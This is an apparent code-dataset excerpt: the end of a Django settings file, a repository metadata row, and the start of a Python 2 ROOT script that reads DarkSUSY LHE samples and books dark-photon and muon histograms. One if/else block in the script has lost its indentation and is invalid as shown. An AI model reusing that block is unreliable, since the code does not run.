# DRF API clients authenticate with token auth only.
REST_FRAMEWORK = {
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'rest_framework.authentication.TokenAuthentication',
    )
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
# Hashed + gzipped static files served by WhiteNoise.
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, "static"),
]
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Apply Heroku-specific settings (db, static, logging) on top of the above.
django_heroku.settings(locals())
| [
"[email protected]"
]
| |
59411623046d6332476124e04690091dcaed47f4 | 25864296fe1d059bba11e999541828ea5eadc5b9 | /DarkSUSY_mH_125/mGammaD_0275/cT_10000/DarkSUSY_LHE_read.py | 67e6e5eb47bd296666d7acc0323970e5aa374aa6 | []
| no_license | bmichlin/MuJetAnalysis_DarkSusySamples_LHE_13TeV_01 | 17965f8eddf65d24a7c3c8ab81f92c3fc21f4f58 | 1de8d11f1a2e86874cd92b9819adbad4a6780b81 | refs/heads/master | 2020-06-14T12:54:38.920627 | 2015-03-18T14:00:07 | 2015-03-18T14:00:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111,093 | py | import ROOT, array, os, re, math, random, string
from math import *
from operator import itemgetter
def getStringBetween(name, first, second):
    """Return the substring of name between the first occurrence of
    `first` and the first occurrence of `second` that FOLLOWS it.

    Raises ValueError when either delimiter is missing.  The original
    implementation used str.find, whose -1 miss value was silently used
    as a slice index, and searched for `second` from position 0, so an
    occurrence of `second` earlier in the string garbled the result.
    """
    begOf1 = name.index(first)           # ValueError if `first` is absent
    endOf1 = begOf1 + len(first)
    # Look for the closing delimiter only after the opening one.
    begOf2 = name.index(second, endOf1)  # ValueError if `second` is absent
    return name[endOf1:begOf2]
# PDG-style particle IDs looked for in the LHE event records.
muonID = 13
higgsID = 25
n1ID = 3000002       # neutralino n1
nDID = 3000001       # dark neutralino nD
# Stop processing after this many events.
nExit = 80002
# nExit = 1000
gammaDID = 3000022   # dark photon
# Sample-point masses (GeV) as strings, used in legend text below.
hMass = "125"
n1Mass = "10"
nDMass = "1"
# Input LHE file for this sample point.  (The original assigned the same
# literal twice in a row; the redundant duplicate has been removed.)
filename = "DarkSUSY_mH_125_mGammaD_0275_13TeV_cT_10000_madgraph452_bridge224_events80k.lhe"
f = open(filename, 'r')
# Parse the sample-point parameters (dark-photon mass, lifetime, beam
# energy, Higgs mass) out of the filename.  Long names include a "_cT_"
# lifetime token; the short form (else branch) has no lifetime and is
# treated as cT = 0.
# NOTE(review): the length-77 threshold and the slice arithmetic below
# assume the exact DarkSUSY_mH_..._events80k.lhe naming scheme -- confirm
# before reusing with other files.
if len(filename) >= 77:
    mass_GammaD = getStringBetween(filename, "mGammaD_","_13TeV_cT")
    lifetime_GammaD = getStringBetween(filename, "_cT_","_madgraph452")
    energy = getStringBetween(filename, mass_GammaD + "_","TeV_")
    mass_Higgs = getStringBetween(filename, "_mH_","_mGammaD_")
    # Insert a decimal point two digits from the end: "10000" -> "100.00" mm.
    lifetime_GammaD_Legend = lifetime_GammaD[0:-2] + "." + lifetime_GammaD[len(lifetime_GammaD)-2:len(lifetime_GammaD)]
    # Insert a decimal point three digits from the end: "0275" -> "0.275" GeV.
    # NOTE(review): the end index uses len(lifetime_GammaD)+1, not
    # len(mass_GammaD) -- presumably works because both tokens are short;
    # verify for other mass points.
    mass_GammaD_Legend = mass_GammaD[0:-3] + "." + mass_GammaD[len(mass_GammaD)-3:len(lifetime_GammaD)+1]
    #mass_GammaD = filename[24:-49]
    #lifetime_GammaD = filename[38:-36]
    #energy = filename[29:-46]
    #mass_Higgs = filename[12:-62]
    #lifetime_GammaD_Legend = filename[38:-38] + "." + filename[39:-36]
    #mass_GammaD_Legend = filename [24:-52] + "." + filename[25:-49]
    # Strip up to three trailing zeros from the mass legend, then restore a
    # single trailing zero if only "N." is left (e.g. "2." -> "2.0").
    if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
    if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
    if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
    if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "." and len(mass_GammaD_Legend) <= 3: mass_GammaD_Legend = mass_GammaD_Legend + "0"
    # Strip at most two trailing zeros from the lifetime legend; `switch`
    # ensures the second zero is only removed if the first one was.
    switch = 0
    if lifetime_GammaD_Legend[len(lifetime_GammaD_Legend)-1] == "0":
        lifetime_GammaD_Legend = lifetime_GammaD_Legend[:-1]
        switch = 1
    if lifetime_GammaD_Legend[len(lifetime_GammaD_Legend)-1] == "0" and switch == 1: lifetime_GammaD_Legend = lifetime_GammaD_Legend[:-1]
else:
    # Short filename form: no lifetime token, treat as prompt decay (cT = 0).
    lifetime_GammaD = "000"
    lifetime_GammaD_Legend = "0.00"
    mass_GammaD = getStringBetween(filename, "mGammaD_","_13TeV")
    energy = getStringBetween(filename, mass_GammaD + "_","TeV")
    mass_Higgs = getStringBetween(filename, "_mH_","_mGammaD_")
    mass_GammaD_Legend = mass_GammaD[0:-3] + "." + mass_GammaD[len(mass_GammaD)-3:len(lifetime_GammaD)+1]
    #mass_GammaD = filename[24:-42]
    #energy = filename[29:-39]
    #mass_Higgs = filename[12:-55]
    #mass_GammaD_Legend = filename[24:-45] + "." + filename[25:-42]
    #lifetime_GammaD = "000"
    #lifetime_GammaD_Legend = "0.00"
# Echo the parsed parameters (Python 2 print statements).
print mass_GammaD
print lifetime_GammaD
print lifetime_GammaD_Legend
print mass_GammaD_Legend
# Output ROOT file for all validation histograms of this sample point.
BAM = ROOT.TFile("ValidationPlots_mGammaD_" + mass_GammaD + "_" + energy + "_TeV_cT_" + lifetime_GammaD + ".root" , "RECREATE")
# Apply the standard CMS TDR plotting style (Python 2 execfile).
execfile("tdrStyle.py")
cnv = ROOT.TCanvas("cnv", "cnv")
# Header "legend" used purely as a text banner across the top of each plot.
txtHeader = ROOT.TLegend(.17,.935,0.97,1.)
txtHeader.SetFillColor(ROOT.kWhite)
txtHeader.SetFillStyle(0)
txtHeader.SetBorderSize(0)
txtHeader.SetTextFont(42)
txtHeader.SetTextSize(0.045)
txtHeader.SetTextAlign(22)
#txtHeader.SetHeader("CMS Simulation")
txtHeader.SetHeader("CMS Simulation (LHE) " + energy + " TeV")
#txtHeader.SetHeader("CMS Prelim. 2011 #sqrt{s} = 7 TeV L_{int} = 5.3 fb^{-1}")
#txtHeader.SetHeader("CMS 2011 #sqrt{s} = 7 TeV L_{int} = 5.3 fb^{-1}")
#txtHeader.SetHeader("CMS Prelim. 2012 #sqrt{s} = 8 TeV L_{int} = 20.65 fb^{-1}")
#txtHeader.SetHeader("CMS 2012 #sqrt{s} = 8 TeV L_{int} = 20.65 fb^{-1}")
txtHeader.Draw()
# In-plot info box describing the decay chain and sample-point parameters.
#info = ROOT.TLegend(0.33,0.8222222,0.9577778,0.9122222)
info = ROOT.TLegend(0.4566667,0.82,0.7822222,0.9066667)
info.SetFillColor(ROOT.kWhite)
info.SetFillStyle(0)
info.SetBorderSize(0)
info.SetTextFont(42)
info.SetTextSize(0.02777778)
info.SetMargin(0.13)
info.SetHeader("#splitline{pp #rightarrow h #rightarrow 2n_{1} #rightarrow 2n_{D} + 2 #gamma_{D} #rightarrow 2n_{D} + 4#mu}{#splitline{m_{h} = " + mass_Higgs + " GeV, m_{n_{1}} = 10 GeV, m_{n_{D}} = 1 GeV}{m_{#gamma_{D}} = " + mass_GammaD_Legend + " GeV, c#tau_{#gamma_{D}} = " + lifetime_GammaD_Legend + " mm}}" )
#info.SetHeader("#splitline{pp #rightarrow h #rightarrow 2n_{1} #rightarrow 2n_{D} + 2 #gamma_{D} #rightarrow 2n_{D} + 4#mu}{#splitline{#gamma_{D} c#tau = "+lifetime_GammaD_Legend + "mm, Mass = " + mass_GammaD_Legend + "GeV}{M of h = " + hMass + "GeV, M of n_{1} = " + n1Mass + "GeV, M of n_{D} = " + nDMass + "GeV}}" )
# Alternate top banner variant (different placement/text).
txtHeader2 = ROOT.TLegend(0.01333333,0.9311111,0.8133333,0.9955556)
txtHeader2.SetFillColor(ROOT.kWhite)
txtHeader2.SetFillStyle(0)
txtHeader2.SetBorderSize(0)
txtHeader2.SetTextFont(42)
txtHeader2.SetTextSize(0.045)
txtHeader2.SetTextAlign(22)
txtHeader2.SetHeader("CMS Simulation #sqrt{s} = " + energy + " TeV")
# pT of muons
################################################################################
Etmiss_dummy = ROOT.TH1F("Etmiss_dummy","Etmiss_dummy", 100, 0, 100)
Etmiss_dummy.SetTitleOffset(1.5, "Y")
Etmiss_dummy.SetTitleOffset(1.4, "X")
Etmiss_dummy.SetTitleSize(0.04,"X")
Etmiss_dummy.SetXTitle("MET = #sum_{n_{D}}#vec{p_{T}} [GeV]")
Etmiss_dummy.SetYTitle("Fraction of events / 1 GeV")
Etmiss_dummy.SetMaximum( 0.1 )
Etmiss = ROOT.TH1F("Etmiss","Etmiss", 100, 0, 100)
Etmiss.SetLineColor(ROOT.kBlue)
Etmiss.SetLineWidth(2)
Etmiss.SetLineStyle(1)
nBins = 125
binMin = 0.0
binMax = 125.0
yMax = 0.25
cTlow = 0
if float(lifetime_GammaD_Legend) != 0:
cTlim = float(lifetime_GammaD_Legend)*5
binwidth = float(lifetime_GammaD_Legend)
numBins = int(cTlim/binwidth)
binwidthRound = round(binwidth,3)
else:
cTlim = 10
binwidth = 1
numBins = int(cTlim/binwidth)
binwidthRound = "1"
formula = "exp(-x/"+ lifetime_GammaD_Legend +")/("+ lifetime_GammaD_Legend + "*(1 - exp(-" + str(cTlim) + "/" + lifetime_GammaD_Legend + ")))"
print formula
h_gammaD_cT_dummy = ROOT.TH1F("h_gammaD_cT_dummy", "h_gammaD_cT_dummy", numBins, 0, cTlim)
#h_gammaD_cT_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_dummy.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_cT_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_dummy.SetMaximum( 10 )
h_gammaD_cT = ROOT.TH1F("h_gammaD_cT", "h_gammaD_cT", numBins, 0, cTlim)
h_gammaD_cT.SetLineColor(ROOT.kBlue)
h_gammaD_cT.SetLineWidth(2)
h_gammaD_cT.SetLineStyle(1)
h_gammaD_cT_lab_dummy = ROOT.TH1F("h_gammaD_cT_lab_dummy", "h_gammaD_cT_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_lab_dummy.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_cT_lab_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_lab = ROOT.TH1F("h_gammaD_cT_lab", "h_gammaD_cT_lab", numBins, 0, cTlim)
h_gammaD_cT_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_lab.SetLineWidth(2)
h_gammaD_cT_lab.SetLineStyle(1)
h_gammaD_cT_XY_lab_dummy = ROOT.TH1F("h_gammaD_cT_XY_lab_dummy", "h_gammaD_cT_XY_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_XY_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_XY_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_XY_lab_dummy.SetXTitle("L_{XY} of #gamma_{D} [mm]")
h_gammaD_cT_XY_lab_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_XY_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_XY_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_XY_lab = ROOT.TH1F("h_gammaD_cT_XY_lab", "h_gammaD_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_cT_XY_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_XY_lab.SetLineWidth(2)
h_gammaD_cT_XY_lab.SetLineStyle(1)
h_gammaD_cT_Z_lab_dummy = ROOT.TH1F("h_gammaD_cT_Z_lab_dummy", "h_gammaD_cT_Z_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_Z_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_Z_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_Z_lab_dummy.SetXTitle("L_{Z} of #gamma_{D} [mm]")
h_gammaD_cT_Z_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_cT_Z_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_Z_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_Z_lab = ROOT.TH1F("h_gammaD_cT_Z_lab", "h_gammaD_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_cT_Z_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_Z_lab.SetLineWidth(2)
h_gammaD_cT_Z_lab.SetLineStyle(1)
h_gammaD_1_cT_dummy = ROOT.TH1F("h_gammaD_1_cT_dummy", "h_gammaD_1_cT_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_dummy.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_1_cT_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_dummy.SetMaximum( 10 )
h_gammaD_1_cT = ROOT.TH1F("h_gammaD_1_cT", "h_gammaD_1_cT", numBins, 0, cTlim)
h_gammaD_1_cT.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT.SetLineWidth(2)
h_gammaD_1_cT.SetLineStyle(1)
h_gammaD_1_cT_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_lab_dummy", "h_gammaD_1_cT_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_lab_dummy.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_1_cT_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_lab = ROOT.TH1F("h_gammaD_1_cT_lab", "h_gammaD_1_cT_lab", numBins, 0, cTlim)
h_gammaD_1_cT_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_lab.SetLineWidth(2)
h_gammaD_1_cT_lab.SetLineStyle(1)
h_gammaD_1_cT_XY_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_XY_lab_dummy", "h_gammaD_1_cT_XY_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_XY_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_XY_lab_dummy.SetXTitle("L_{XY} of #gamma_{D} [mm]")
h_gammaD_1_cT_XY_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_XY_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_XY_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_XY_lab = ROOT.TH1F("h_gammaD_1_cT_XY_lab", "h_gammaD_1_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_1_cT_XY_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_XY_lab.SetLineWidth(2)
h_gammaD_1_cT_XY_lab.SetLineStyle(1)
h_gammaD_1_cT_Z_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_Z_lab_dummy", "h_gammaD_1_cT_Z_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_Z_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_Z_lab_dummy.SetXTitle("L_{Z} of #gamma_{D} [mm]")
h_gammaD_1_cT_Z_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_Z_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_Z_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_Z_lab = ROOT.TH1F("h_gammaD_1_cT_Z_lab", "h_gammaD_1_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_1_cT_Z_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_Z_lab.SetLineWidth(2)
h_gammaD_1_cT_Z_lab.SetLineStyle(1)
h_gammaD_2_cT = ROOT.TH1F("h_gammaD_2_cT", "h_gammaD_2_cT", numBins, 0, cTlim)
h_gammaD_2_cT.SetLineColor(ROOT.kRed)
h_gammaD_2_cT.SetLineWidth(2)
h_gammaD_2_cT.SetLineStyle(1)
h_gammaD_2_cT_lab = ROOT.TH1F("h_gammaD_2_cT_lab", "h_gammaD_2_cT_lab", numBins, 0, cTlim)
h_gammaD_2_cT_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_lab.SetLineWidth(2)
h_gammaD_2_cT_lab.SetLineStyle(1)
h_gammaD_2_cT_XY_lab = ROOT.TH1F("h_gammaD_2_cT_XY_lab", "h_gammaD_2_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_2_cT_XY_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_XY_lab.SetLineWidth(2)
h_gammaD_2_cT_XY_lab.SetLineStyle(1)
h_gammaD_2_cT_Z_lab = ROOT.TH1F("h_gammaD_2_cT_Z_lab", "h_gammaD_2_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_2_cT_Z_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_Z_lab.SetLineWidth(2)
h_gammaD_2_cT_Z_lab.SetLineStyle(1)
h_muon_pT_dummy = ROOT.TH1F("h_muon_pT_dummy", "h_muon_pT_dummy", nBins, binMin, binMax)
h_muon_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_pT_dummy.SetTitleOffset(1.35, "Y")
h_muon_pT_dummy.SetXTitle("p_{T} of #mu [GeV]")
h_muon_pT_dummy.SetMaximum( 0.2 )
h_higgs_pT_dummy = ROOT.TH1F("h_higgs_pT_dummy", "h_higgs_pT_dummy", 10, 0, 10)
h_higgs_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_pT_dummy.SetTitleOffset(1.35, "Y")
h_higgs_pT_dummy.SetXTitle("p_{T} of h [GeV]")
h_higgs_pT_dummy.SetMaximum( 1.1 )
h_muon_pZ_dummy = ROOT.TH1F("h_muon_pZ_dummy", "h_muon_pZ_dummy", nBins, binMin, binMax)
h_muon_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_pZ_dummy.SetTitleOffset(1.35, "Y")
h_muon_pZ_dummy.SetXTitle("|p_{Z}| of #mu [GeV]")
h_muon_pZ_dummy.SetMaximum( yMax )
h_higgs_pZ_dummy = ROOT.TH1F("h_higgs_pZ_dummy", "h_higgs_pZ_dummy", 50, 0, 500)
h_higgs_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_pZ_dummy.SetTitleOffset(1.35, "Y")
h_higgs_pZ_dummy.SetXTitle("|p_{Z}| of h [GeV]")
h_higgs_pZ_dummy.SetMaximum( 0.1 )
h_muon_Eta_dummy = ROOT.TH1F("h_muon_Eta_dummy", "h_muon_Eta_dummy", 100, -5, 5)
h_muon_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_muon_Eta_dummy.SetTitleOffset(1.35, "Y")
h_muon_Eta_dummy.SetXTitle("#eta of #mu")
h_muon_Eta_dummy.SetMaximum( 0.1 )
#h_higgs_Eta_dummy = ROOT.TH1F("h_higgs_Eta_dummy", "h_higgs_Eta_dummy", 100,-5,5)
#h_higgs_Eta_dummy.SetYTitle("Fraction of events / 0.1 GeV")
#h_higgs_Eta_dummy.SetTitleOffset(1.35, "Y")
#h_higgs_Eta_dummy.SetXTitle("#eta of h [GeV]")
#h_higgs_Eta_dummy.SetMaximum( 0.1 )
h_muon_Phi_dummy = ROOT.TH1F("h_muon_Phi_dummy", "h_muon_Phi_dummy", 80,-4,4)
h_muon_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_muon_Phi_dummy.SetTitleOffset(1.35, "Y")
h_muon_Phi_dummy.SetXTitle("#phi of #mu [rad]")
h_muon_Phi_dummy.SetMaximum( 0.1 )
h_higgs_Phi_dummy = ROOT.TH1F("h_higgs_Phi_dummy", "h_higgs_Phi_dummy", 80,-4,4)
h_higgs_Phi_dummy.SetYTitle("Fraction of events")
h_higgs_Phi_dummy.SetTitleOffset(1.35, "Y")
h_higgs_Phi_dummy.SetXTitle("#phi of h [rad]")
h_higgs_Phi_dummy.SetMaximum( 1.4 )
h_higgs_p_dummy = ROOT.TH1F("h_higgs_p_dummy", "h_higgs_p_dummy", 50, 0, 500)
h_higgs_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_p_dummy.SetTitleOffset(1.35, "Y")
h_higgs_p_dummy.SetXTitle("p of h [GeV]")
h_higgs_p_dummy.SetMaximum( 0.1 )
h_higgs_M_dummy = ROOT.TH1F("h_higgs_M_dummy", "h_higgs_M_dummy", 220, 80.5, 300.5)
h_higgs_M_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_M_dummy.SetTitleOffset(1.35, "Y")
h_higgs_M_dummy.SetXTitle("Mass of h [GeV]")
h_higgs_M_dummy.SetLabelSize(0.03,"X")
h_higgs_M_dummy.SetMaximum( 1.5 )
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_p = ROOT.TH1F("h_higgs_p", "h_higgs_p", 50, 0, 500)
h_higgs_p.SetLineColor(ROOT.kBlue)
h_higgs_p.SetLineWidth(2)
h_higgs_p.SetLineStyle(1)
h_higgs_M = ROOT.TH1F("h_higgs_M", "h_higgs_M", 10, 120.5, 130.5)
h_higgs_M.SetLineColor(ROOT.kBlue)
h_higgs_M.SetLineWidth(2)
h_higgs_M.SetLineStyle(1)
h_higgs_pT = ROOT.TH1F("h_higgs_pT", "h_higgs_pT", 10, 0, 10)
h_higgs_pT.SetLineColor(ROOT.kBlue)
h_higgs_pT.SetLineWidth(2)
h_higgs_pT.SetLineStyle(1)
h_n1_1_pT_dummy = ROOT.TH1F("h_n1_1_pT_dummy", "h_n1_1_pT_dummy", 70, 0, 70)
h_n1_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_pT_dummy.SetXTitle("p_{T} of n_{1} [GeV]")
h_n1_1_pT_dummy.SetMaximum( yMax )
h_higgs_pZ = ROOT.TH1F("h_higgs_pZ", "h_higgs_pZ", 50, 0, 500)
h_higgs_pZ.SetLineColor(ROOT.kBlue)
h_higgs_pZ.SetLineWidth(2)
h_higgs_pZ.SetLineStyle(1)
h_n1_1_pZ_dummy = ROOT.TH1F("h_n1_1_pZ_dummy", "h_n1_1_pZ_dummy", 300, 0, 300)
h_n1_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_pZ_dummy.SetXTitle("|p_{Z}| of n_{1} [GeV]")
h_n1_1_pZ_dummy.SetMaximum( 0.1 )
#h_higgs_Eta = ROOT.TH1F("h_higgs_Eta", "h_higgs_Eta", 50,0,5)
#h_higgs_Eta.SetLineColor(ROOT.kBlue)
#h_higgs_Eta.SetLineWidth(2)
#h_higgs_Eta.SetLineStyle(1)
h_n1_1_Eta_dummy = ROOT.TH1F("h_n1_1_Eta_dummy", "h_n1_1_Eta_dummy", 100,-5,5)
# --- n1 (neutralino) and nD (dark neutralino) kinematic histograms. ---
# Histograms named "*_dummy" are never filled: they only carry the axis
# titles/ranges used when drawing; the filled histograms are overlaid on them.
h_n1_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_n1_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_Eta_dummy.SetXTitle("#eta of n_{1}")
h_n1_1_Eta_dummy.SetMaximum( 0.1 )
h_higgs_Phi = ROOT.TH1F("h_higgs_Phi", "h_higgs_Phi", 80,-4,4)
h_higgs_Phi.SetLineColor(ROOT.kBlue)
h_higgs_Phi.SetLineWidth(2)
h_higgs_Phi.SetLineStyle(1)
h_n1_1_Phi_dummy = ROOT.TH1F("h_n1_1_Phi_dummy", "h_n1_1_Phi_dummy", 80,-4,4)
h_n1_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_n1_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_Phi_dummy.SetXTitle("#phi of n_{1} [rad]")
h_n1_1_Phi_dummy.SetMaximum( 0.05 )
h_n1_1_p_dummy = ROOT.TH1F("h_n1_1_p_dummy", "h_n1_1_p_dummy", 300, 0, 300)
h_n1_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_p_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_p_dummy.SetXTitle("p of n_{1} [GeV]")
h_n1_1_p_dummy.SetMaximum( 0.1 )
h_n1_1_M_dummy = ROOT.TH1F("h_n1_1_M_dummy", "h_n1_1_M_dummy", 200, 0.05, 20.05)
h_n1_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_n1_1_M_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_M_dummy.SetXTitle("Mass of n_{1} [GeV]")
h_n1_1_M_dummy.SetMaximum( 1.6 )
# Filled histograms: "_1" = leading (highest-pT) candidate, drawn in blue;
# "_2" = sub-leading, drawn in red (see the pT sort in the event loop below).
h_n1_1_p = ROOT.TH1F("h_n1_1_p", "h_n1_1_p", 300, 0, 300)
h_n1_1_p.SetLineColor(ROOT.kBlue)
h_n1_1_p.SetLineWidth(2)
h_n1_1_p.SetLineStyle(1)
h_n1_1_M = ROOT.TH1F("h_n1_1_M", "h_n1_1_M", 200, 0.05, 20.05)
h_n1_1_M.SetLineColor(ROOT.kBlue)
h_n1_1_M.SetLineWidth(2)
h_n1_1_M.SetLineStyle(1)
h_n1_1_pT = ROOT.TH1F("h_n1_1_pT", "h_n1_1_pT", 70, 0, 70) #this is the peak at 60
h_n1_1_pT.SetLineColor(ROOT.kBlue)
h_n1_1_pT.SetLineWidth(2)
h_n1_1_pT.SetLineStyle(1)
h_n1_1_pZ = ROOT.TH1F("h_n1_1_pZ", "h_n1_1_pZ", 300, 0, 300)
h_n1_1_pZ.SetLineColor(ROOT.kBlue)
h_n1_1_pZ.SetLineWidth(2)
h_n1_1_pZ.SetLineStyle(1)
h_n1_1_Eta = ROOT.TH1F("h_n1_1_Eta", "h_n1_1_Eta", 100,-5,5)
h_n1_1_Eta.SetLineColor(ROOT.kBlue)
h_n1_1_Eta.SetLineWidth(2)
h_n1_1_Eta.SetLineStyle(1)
h_n1_1_Phi = ROOT.TH1F("h_n1_1_Phi", "h_n1_1_Phi", 80,-4,4)
h_n1_1_Phi.SetLineColor(ROOT.kBlue)
h_n1_1_Phi.SetLineWidth(2)
h_n1_1_Phi.SetLineStyle(1)
#h_n1_2_pT_dummy = ROOT.TH1F("h_n1_2_pT_dummy", "h_n1_2_pT_dummy", 700, 0, 70) #this is the peak at ~10GeV
#h_n1_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_pT_dummy.SetXTitle("p_{T n_{1}} [GeV]")
#h_n1_2_pT_dummy.SetMaximum( yMax )
#
#h_n1_2_p_dummy = ROOT.TH1F("h_n1_2_p_dummy", "h_n1_2_p_dummy", 20, 50, 70)
#h_n1_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_p_dummy.SetXTitle("p_{n_{1}} [GeV]")
#h_n1_2_p_dummy.SetMaximum( 0.05 )
#
#h_n1_2_M_dummy = ROOT.TH1F("h_n1_2_M_dummy", "h_n1_2_M_dummy", 200, 0, 20)
#h_n1_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_M_dummy.SetXTitle("m_{n_{1}} [GeV]")
#h_n1_2_M_dummy.SetMaximum( 1.2 )
